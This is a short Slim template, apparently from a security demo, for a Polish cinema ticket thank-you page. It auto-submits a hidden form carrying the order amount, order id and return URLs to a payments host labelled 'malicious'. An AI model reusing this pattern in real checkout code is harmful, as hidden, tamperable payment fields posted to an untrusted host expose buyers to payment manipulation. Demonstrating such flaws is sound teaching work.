h1 Dziękujemy za zakup biletu.

p Za chwilę zostaniesz przekierowany do strony płatności.

= form_tag Domain.url(:malicious, :payments, "/payment") do
  = hidden_field_tag "success_url", Domain.url(:credible, :cinema, "/confirm_ticket/#{@order.id}")
  = hidden_field_tag "failure_url", Domain.url(:credible, :cinema, "/")
  = hidden_field_tag "amount", @order.amount
  = hidden_field_tag "order_id", @order.id

javascript:
  $(function() {
    setTimeout(function() {
      $('form').submit();
    }, 2000);
  });